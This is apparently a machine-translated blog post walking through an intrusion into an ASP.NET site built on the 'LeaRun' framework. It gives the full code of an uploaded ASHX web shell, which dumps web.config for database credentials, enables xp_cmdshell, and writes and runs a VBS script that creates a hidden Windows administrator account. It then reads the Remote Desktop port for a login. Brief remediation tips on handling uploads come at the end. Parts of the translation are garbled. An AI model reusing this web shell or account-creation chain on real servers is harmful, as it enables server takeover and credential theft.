Second wave of ASP. NET Website intrusion

Second wave of ASP. NET Website intrusion

1. upload code page I uploaded the ashx page.

2. Use the text on the ashx page to display the web. Config content to get the database connection,

3. Use ashx to output the vbs script in the root directory of the website (create a Windows Account script)

4. Enable xp_mongoshell for the database.

5. Use the database to output the vbs script in the root directory of the website. The intrusion completes the ashx code file as follows:

/// <Summary> // display the configuration file /// </summary> /// <param name = "context"> </param> public void ShowWebConfig (HttpContext context) {context. response. write (System. IO. file. readAllText (context. request. mapPath ("~ /Web. config ")));} /// <summary> /// write the vbs script /// </summary> /// <param name = "context"> </param> public void WriteVbs (HttpContext context) {System. IO. file. writeAllText (context. request. mapPath ("~ /1.vbs"), "set wsnetwork = CreateObject (\" WSCRIPT. NETWORK \ ") \ r \ nos = \" WinNT: // \ "& wsnetwork. computerName \ r \ nSet ob = GetObject (OS) 'to obtain the adsi interface, bind the \ r \ nSet oe = GetObject (OS & \ "/Administrators, group \")' attribute, admin group \ r \ nSet od = ob. create (\ "user \", \ "test \") 'creates a user \ r \ nod. setPassword \ "1234 \" 'Set Password \ r \ nod. setInfo 'Save \ r \ nSet of = GetObject (OS & \ "/test \", user) 'To get user \ r \ noe. add OS & \ "/freeast \" \ r \ n ") ;}/// <summary> // linear database/ /// </Summary> /// <param name = "connection"> </param> /// <param name = "SQL"> </param> public void ExecuteSql (string connection, string SQL) {using (SqlConnection con = new SqlConnection (connection) {using (SqlCommand commd = new SqlCommand (SQL, con) {con. open (); commd. executeNonQuery (); con. close ();}}} /// <summary> /// line database and output table /// </summary> /// <param name = "context"> </param> /// <param n Ame = "connection"> </param> // <param name = "SQL"> </param> public void ExecuteSql1 (HttpContext context, string connection, string SQL) {System. data. dataTable table = new System. data. dataTable (); using (SqlConnection con = new SqlConnection (connection) {using (SqlCommand commd = new SqlCommand (SQL, con) {con. open (); using (SqlDataAdapter ad = new SqlDataAdapter (commd) {ad. fill (table);} con. clo Se () ;}} foreach (System. data. dataRow row in table. rows) {foreach (System. data. dataColumn column in table. columns) {context. response. write (row [column]); context. response. write ("\ t");} context. response. write ("\ r \ n ");}} /// <summary> /// display the Remote Desktop port /// </summary> /// <param name = "context"> </param> private void ShowPort (HttpContext context) {context. response. write (Microsoft. win32.Registry. localM Achine. openSubKey (@ "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp "). getValue ("PortNumber "). toString ();} public void ProcessRequest (HttpContext context) {context. response. contentType = "text/plain"; try {var connection = context. request. queryString ["connection"]; switch (context. request. queryString ["method"]) {case "": WriteVbs (context); break; case "": ExecuteSql (connecti On, @ "sp_configure 'show advanced options', 1 reconfigure"); ExecuteSql (connection, @ "sp_configure 'xp _ javasshell', 1 reconfigure "); // enable xp_cmdshell break; case ": ExecuteSql1 (context, connection," exec master .. xp_cmdshell 'cscript "+ context. request. mapPath ("~ /1.vbs") + "'"); break; case "": ShowPort (context); break; default: ShowWebConfig (context); break;} catch (Exception ex) {context. response. write (ex. message);} context. response. end () ;}public bool IsReusable {get {return false ;}}

Here we take the online button "LeaRun. Rapid informatization development framework" as an example.

I won't talk about uploading files. Someone asked me how to display the content of web. Config in the previous article. I am posting the code here, which is actually very simple. The File. ReadAllText web. config File is enough.

public void ShowWebConfig(HttpContext context)         {             context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));         }

After running the command, ashx returns the database connection,

The second is the script for creating a Windows account.

Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ") OS =" WinNT: // "& wsnetwork. computerNameSet ob = GetObject (OS) 'to obtain the adsi interface, bind the Set oe = GetObject (OS & "/Administrators, group")' attribute, and Set od = ob in the admin group. create ("user", "test") 'creates a user od. setPassword "1234" 'sets the password od. setInfo 'Save Set of = GetObject (OS & "/test", user) 'To get user oe. add OS & "/freeast"

Then open the xp_mongoshell of the database.

sp_configure 'show advanced options'，  reconfigureGosp_configure 'xp_cmdshell'， reconfigure

Run the vbs script at the end.

Exec master .. xp_mongoshell 'cscript script file directory "'

The running result is as follows:

Okay. This indicates that the straight line is successful .... That is, the server user is successfully added.

 

Now we have to start remote desktop, so a port scanning tool found that 3389 is off, so it was determined that it was a modified port, so we added a code to allow the program to read the Remote Desktop port,

The Code is as follows:

/// <Summary> /// display the Remote Desktop port /// </summary> /// <param name = "context"> </param> private void ShowPort (HttpContext context) {context. response. write (Microsoft. win32.Registry. localMachine. openSubKey (@ "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp "). getValue ("PortNumber "). toString ());}

Now everything is done. Open the Remote Desktop Connection ..

 

This is because the event owner has not been notified yet, so I helped the victim fix the vulnerability and sent it out. So you should not try it either -.-!!!!

Then I will talk about the remedy. I will briefly introduce several methods.

1. Put the uploaded file out of the website, that is to say, the iit cannot be read (but remember to assign permissions). For example, if my website is placed on d: \ Web \ Oa \ This is the directory of my website, so the files I uploaded can be placed in d: \ File \ OA, and others cannot access them directly.

2. Create a new web. config in the directory of the uploaded file to reject all requests. (C # can be read, but Response. WriteFile must be used for output)

3. All Compression